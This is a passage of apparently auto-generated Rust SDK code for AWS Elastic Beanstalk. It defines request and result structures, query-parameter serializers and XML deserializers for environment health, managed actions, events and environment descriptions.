#[doc="<p>Specify the environment by ID.</p> <p>You must specify either this or an EnvironmentName, or both.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>Specify the environment by name.</p> <p>You must specify either this or an EnvironmentName, or both.</p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `DescribeEnvironmentHealthRequest` contents to a `SignedRequest`. struct DescribeEnvironmentHealthRequestSerializer; impl DescribeEnvironmentHealthRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentHealthRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.attribute_names { EnvironmentHealthAttributesSerializer::serialize( params, &format!("{}{}", prefix, "AttributeNames"), field_value, ); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>Health details for an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentHealthResult { #[doc="<p>Application request metrics for the environment.</p>"] pub application_metrics: Option<ApplicationMetrics>, #[doc="<p>Descriptions of the data that contributed to the environment's current health status.</p>"] pub causes: Option<Causes>, #[doc="<p>The <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">health color</a> of the environment.</p>"] pub color: Option<String>, #[doc="<p>The environment's name.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">health status</a> of the environment. For example, <code>Ok</code>.</p>"] pub health_status: Option<String>, #[doc="<p>Summary health information for the instances in the environment.</p>"] pub instances_health: Option<InstanceHealthSummary>, #[doc="<p>The date and time that the health information was retrieved.</p>"] pub refreshed_at: Option<RefreshedAt>, #[doc="<p>The environment's operational status. <code>Ready</code>, <code>Launching</code>, <code>Updating</code>, <code>Terminating</code>, or <code>Terminated</code>.</p>"] pub status: Option<EnvironmentHealth>, } struct DescribeEnvironmentHealthResultDeserializer; impl DescribeEnvironmentHealthResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentHealthResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentHealthResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationMetrics" => { obj.application_metrics = Some(try!(ApplicationMetricsDeserializer::deserialize("ApplicationMetrics", stack))); } "Causes" => { obj.causes = Some(try!(CausesDeserializer::deserialize("Causes", stack))); } "Color" => { obj.color = Some(try!(StringDeserializer::deserialize("Color", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "HealthStatus" => { obj.health_status = Some(try!(StringDeserializer::deserialize("HealthStatus", stack))); } "InstancesHealth" => { obj.instances_health = Some(try!(InstanceHealthSummaryDeserializer::deserialize("InstancesHealth", stack))); } "RefreshedAt" => { obj.refreshed_at = Some(try!(RefreshedAtDeserializer::deserialize("RefreshedAt", stack))); } "Status" => { obj.status = Some(try!(EnvironmentHealthDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to list completed and failed managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionHistoryRequest { #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The maximum number of items to return for a single request.</p>"] pub max_items: Option<Integer>, #[doc="<p>The pagination token returned by a previous request.</p>"] pub next_token: Option<String>, } /// Serialize `DescribeEnvironmentManagedActionHistoryRequest` contents to a `SignedRequest`. struct DescribeEnvironmentManagedActionHistoryRequestSerializer; impl DescribeEnvironmentManagedActionHistoryRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentManagedActionHistoryRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.max_items { params.put(&format!("{}{}", prefix, "MaxItems"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } } } #[doc="<p>A result message containing a list of completed and failed managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionHistoryResult { #[doc="<p>A list of completed and failed managed actions.</p>"] pub managed_action_history_items: Option<ManagedActionHistoryItems>, #[doc="<p>A pagination token that you pass to <a>DescribeEnvironmentManagedActionHistory</a> to get the next page of results.</p>"] pub next_token: Option<String>, } struct DescribeEnvironmentManagedActionHistoryResultDeserializer; impl DescribeEnvironmentManagedActionHistoryResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentManagedActionHistoryResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentManagedActionHistoryResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ManagedActionHistoryItems" => { obj.managed_action_history_items = Some(try!(ManagedActionHistoryItemsDeserializer::deserialize("ManagedActionHistoryItems", stack))); } "NextToken" => { obj.next_token = Some(try!(StringDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to list an environment's upcoming and in-progress managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionsRequest { #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<String>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<String>, #[doc="<p>To show only actions with a particular status, specify a status.</p>"] pub status: Option<ActionStatus>, } /// Serialize `DescribeEnvironmentManagedActionsRequest` contents to a `SignedRequest`. struct DescribeEnvironmentManagedActionsRequestSerializer; impl DescribeEnvironmentManagedActionsRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentManagedActionsRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.status { params.put(&format!("{}{}", prefix, "Status"), &field_value); } } } #[doc="<p>The result message containing a list of managed actions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentManagedActionsResult { #[doc="<p>A list of upcoming and in-progress managed actions.</p>"] pub managed_actions: Option<ManagedActions>, } struct DescribeEnvironmentManagedActionsResultDeserializer; impl DescribeEnvironmentManagedActionsResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeEnvironmentManagedActionsResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeEnvironmentManagedActionsResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ManagedActions" => { obj.managed_actions = Some(try!(ManagedActionsDeserializer::deserialize("ManagedActions", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to describe the resources in an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentResourcesMessage { #[doc="<p>The ID of the environment to retrieve AWS resource usage data.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to retrieve AWS resource usage data.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `DescribeEnvironmentResourcesMessage` contents to a `SignedRequest`. struct DescribeEnvironmentResourcesMessageSerializer; impl DescribeEnvironmentResourcesMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentResourcesMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>Request to describe one or more environments.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that are associated with this application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that have the specified IDs.</p>"] pub environment_ids: Option<EnvironmentIdList>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that have the specified names.</p>"] pub environment_names: Option<EnvironmentNamesList>, #[doc="<p>Indicates whether to include deleted environments:</p> <p> <code>true</code>: Environments that have been deleted after <code>IncludedDeletedBackTo</code> are displayed.</p> <p> <code>false</code>: Do not include deleted environments.</p>"] pub include_deleted: Option<IncludeDeleted>, #[doc="<p> If specified when <code>IncludeDeleted</code> is set to <code>true</code>, then environments deleted after this date are displayed. </p>"] pub included_deleted_back_to: Option<IncludeDeletedBackTo>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those that are associated with this application version.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `DescribeEnvironmentsMessage` contents to a `SignedRequest`. struct DescribeEnvironmentsMessageSerializer; impl DescribeEnvironmentsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEnvironmentsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.environment_ids { EnvironmentIdListSerializer::serialize( params, &format!("{}{}", prefix, "EnvironmentIds"), field_value, ); } if let Some(ref field_value) = obj.environment_names { EnvironmentNamesListSerializer::serialize( params, &format!("{}{}", prefix, "EnvironmentNames"), field_value, ); } if let Some(ref field_value) = obj.include_deleted { params.put(&format!("{}{}", prefix, "IncludeDeleted"), &field_value.to_string()); } if let Some(ref field_value) = obj.included_deleted_back_to { params.put(&format!("{}{}", prefix, "IncludedDeletedBackTo"), &field_value); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Request to retrieve a list of events for an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEventsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to include only those associated with this application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p> If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that occur up to, but not including, the <code>EndTime</code>. </p>"] pub end_time: Option<TimeFilterEnd>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Specifies the maximum number of events that can be returned, beginning with the most recent event.</p>"] pub max_records: Option<MaxRecords>, #[doc="<p>Pagination token. If specified, the events return the next batch of results.</p>"] pub next_token: Option<Token>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the described events to include only those associated with this request ID.</p>"] pub request_id: Option<RequestId>, #[doc="<p>If specified, limits the events returned from this call to include only those with the specified severity or higher.</p>"] pub severity: Option<EventSeverity>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that occur on or after this time.</p>"] pub start_time: Option<TimeFilterStart>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those that are associated with this environment configuration.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to those associated with this application version.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `DescribeEventsMessage` contents to a `SignedRequest`. struct DescribeEventsMessageSerializer; impl DescribeEventsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeEventsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.end_time { params.put(&format!("{}{}", prefix, "EndTime"), &field_value); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.max_records { params.put(&format!("{}{}", prefix, "MaxRecords"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } if let Some(ref field_value) = obj.request_id { params.put(&format!("{}{}", prefix, "RequestId"), &field_value); } if let Some(ref field_value) = obj.severity { params.put(&format!("{}{}", prefix, "Severity"), &field_value); } if let Some(ref field_value) = obj.start_time { params.put(&format!("{}{}", prefix, "StartTime"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Parameters for a call to <code>DescribeInstancesHealth</code>.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeInstancesHealthRequest { #[doc="<p>Specifies the response elements you wish to receive. To retrieve all attributes, set to <code>All</code>. If no attribute names are specified, returns a list of instances.</p>"] pub attribute_names: Option<InstancesHealthAttributes>, #[doc="<p>Specify the AWS Elastic Beanstalk environment by ID.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>Specify the AWS Elastic Beanstalk environment by name.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Specify the pagination token returned by a previous call.</p>"] pub next_token: Option<NextToken>, } /// Serialize `DescribeInstancesHealthRequest` contents to a `SignedRequest`. struct DescribeInstancesHealthRequestSerializer; impl DescribeInstancesHealthRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeInstancesHealthRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.attribute_names { InstancesHealthAttributesSerializer::serialize( params, &format!("{}{}", prefix, "AttributeNames"), field_value, ); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } } } #[doc="<p>Detailed health information about the Amazon EC2 instances in an AWS Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeInstancesHealthResult { #[doc="<p>Detailed health information about each instance.</p>"] pub instance_health_list: Option<InstanceHealthList>, #[doc="<p>Pagination token for the next page of results, if available.</p>"] pub next_token: Option<NextToken>, #[doc="<p>The date and time that the health information was retrieved.</p>"] pub refreshed_at: Option<RefreshedAt>, } struct DescribeInstancesHealthResultDeserializer; impl DescribeInstancesHealthResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DescribeInstancesHealthResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = DescribeInstancesHealthResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "InstanceHealthList" => { obj.instance_health_list = Some(try!(InstanceHealthListDeserializer::deserialize("InstanceHealthList", stack))); } "NextToken" => { obj.next_token = Some(try!(NextTokenDeserializer::deserialize("NextToken", stack))); } "RefreshedAt" => { obj.refreshed_at = Some(try!(RefreshedAtDeserializer::deserialize("RefreshedAt", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type Description = String; struct DescriptionDeserializer; impl DescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Description, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Ec2InstanceId = String; struct Ec2InstanceIdDeserializer; impl Ec2InstanceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Ec2InstanceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EndpointURL = String; struct EndpointURLDeserializer; impl EndpointURLDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EndpointURL, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentDescription { #[doc="<p>Indicates if there is an in-progress environment configuration update or application version deployment that you can cancel.</p> <p> <code>true:</code> There is an update in progress. </p> <p> <code>false:</code> There are no updates currently in progress. </p>"] pub abortable_operation_in_progress: Option<AbortableOperationInProgress>, #[doc="<p>The name of the application associated with this environment.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The URL to the CNAME for this environment.</p>"] pub cname: Option<DNSCname>, #[doc="<p>The creation date for this environment.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The last modified date for this environment.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p>Describes this environment.</p>"] pub description: Option<Description>, #[doc="<p>For load-balanced, autoscaling environments, the URL to the LoadBalancer. For single-instance environments, the IP address of the instance.</p>"] pub endpoint_url: Option<EndpointURL>, #[doc="<p>The ID of this environment.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>A list of links to other environments in the same group.</p>"] pub environment_links: Option<EnvironmentLinks>, #[doc="<p>The name of this environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Describes the health status of the environment. AWS Elastic Beanstalk indicates the failure levels for a running environment:</p> <ul> <li> <p> <code>Red</code>: Indicates the environment is not responsive. Occurs when three or more consecutive failures occur for an environment.</p> </li> <li> <p> <code>Yellow</code>: Indicates that something is wrong. Occurs when two consecutive failures occur for an environment.</p> </li> <li> <p> <code>Green</code>: Indicates the environment is healthy and fully functional.</p> </li> <li> <p> <code>Grey</code>: Default health for a new environment. The environment is not fully launched and health checks have not started or health checks are suspended during an <code>UpdateEnvironment</code> or <code>RestartEnvironement</code> request.</p> </li> </ul> <p> Default: <code>Grey</code> </p>"] pub health: Option<EnvironmentHealth>, #[doc="<p>Returns the health status of the application running in your environment. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub health_status: Option<EnvironmentHealthStatus>, #[doc="<p>The description of the AWS resources used by this environment.</p>"] pub resources: Option<EnvironmentResourcesDescription>, #[doc="<p> The name of the <code>SolutionStack</code> deployed with this environment. </p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>The current operational status of the environment:</p> <ul> <li> <p> <code>Launching</code>: Environment is in the process of initial deployment.</p> </li> <li> <p> <code>Updating</code>: Environment is in the process of updating its configuration settings or application version.</p> </li> <li> <p> <code>Ready</code>: Environment is available to have an action performed on it, such as update or terminate.</p> </li> <li> <p> <code>Terminating</code>: Environment is in the shut-down process.</p> </li> <li> <p> <code>Terminated</code>: Environment is not running.</p> </li> </ul>"] pub status: Option<EnvironmentStatus>, #[doc="<p>The name of the configuration template used to originally launch this environment.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>Describes the current tier of this environment.</p>"] pub tier: Option<EnvironmentTier>, #[doc="<p>The application version deployed in this environment.</p>"] pub version_label: Option<VersionLabel>, } struct EnvironmentDescriptionDeserializer; impl EnvironmentDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "AbortableOperationInProgress" => { obj.abortable_operation_in_progress = Some(try!(AbortableOperationInProgressDeserializer::deserialize("AbortableOperationInProgress", stack))); } "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "CNAME" => { obj.cname = Some(try!(DNSCnameDeserializer::deserialize("CNAME", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "EndpointURL" => { obj.endpoint_url = Some(try!(EndpointURLDeserializer::deserialize("EndpointURL", stack))); } "EnvironmentId" => { obj.environment_id = Some(try!(EnvironmentIdDeserializer::deserialize("EnvironmentId", stack))); } "EnvironmentLinks" => { obj.environment_links = Some(try!(EnvironmentLinksDeserializer::deserialize("EnvironmentLinks", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "Health" => { obj.health = Some(try!(EnvironmentHealthDeserializer::deserialize("Health", stack))); } "HealthStatus" => { obj.health_status = Some(try!(EnvironmentHealthStatusDeserializer::deserialize("HealthStatus", stack))); } "Resources" => { obj.resources = Some(try!(EnvironmentResourcesDescriptionDeserializer::deserialize("Resources", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } "Status" => { obj.status = Some(try!(EnvironmentStatusDeserializer::deserialize("Status", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } "Tier" => { obj.tier = Some(try!(EnvironmentTierDeserializer::deserialize("Tier", stack))); } "VersionLabel" => { obj.version_label = Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentDescriptionsList = Vec<EnvironmentDescription>; struct EnvironmentDescriptionsListDeserializer; impl EnvironmentDescriptionsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescriptionsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message containing a list of environment descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentDescriptionsMessage { #[doc="<p> Returns an <a>EnvironmentDescription</a> list. </p>"] pub environments: Option<EnvironmentDescriptionsList>, } struct EnvironmentDescriptionsMessageDeserializer; impl EnvironmentDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Environments" => { obj.environments = Some(try!(EnvironmentDescriptionsListDeserializer::deserialize("Environments", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentHealth = String; struct EnvironmentHealthDeserializer; impl EnvironmentHealthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentHealth, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentHealthAttribute = String; pub type EnvironmentHealthAttributes = Vec<EnvironmentHealthAttribute>; /// Serialize `EnvironmentHealthAttributes` contents to a `SignedRequest`. struct EnvironmentHealthAttributesSerializer; impl EnvironmentHealthAttributesSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentHealthAttributes) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } pub type EnvironmentHealthStatus = String; struct EnvironmentHealthStatusDeserializer; impl EnvironmentHealthStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentHealthStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentId = String; struct EnvironmentIdDeserializer; impl EnvironmentIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentIdList = Vec<EnvironmentId>; /// Serialize `EnvironmentIdList` contents to a `SignedRequest`. struct EnvironmentIdListSerializer; impl EnvironmentIdListSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentIdList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>The information retrieved from the Amazon EC2 instances.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentInfoDescription { #[doc="<p>The Amazon EC2 Instance ID for this information.</p>"] pub ec_2_instance_id: Option<Ec2InstanceId>, #[doc="<p>The type of information retrieved.</p>"] pub info_type: Option<EnvironmentInfoType>, #[doc="<p>The retrieved information.</p>"] pub message: Option<Message>, #[doc="<p>The time stamp when this information was retrieved.</p>"] pub sample_timestamp: Option<SampleTimestamp>, } struct EnvironmentInfoDescriptionDeserializer; impl EnvironmentInfoDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentInfoDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Ec2InstanceId" => { obj.ec_2_instance_id = Some(try!(Ec2InstanceIdDeserializer::deserialize("Ec2InstanceId", stack))); } "InfoType" => { obj.info_type = Some(try!(EnvironmentInfoTypeDeserializer::deserialize("InfoType", stack))); } "Message" => { obj.message = Some(try!(MessageDeserializer::deserialize("Message", stack))); } "SampleTimestamp" => { obj.sample_timestamp = Some(try!(SampleTimestampDeserializer::deserialize("SampleTimestamp", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } 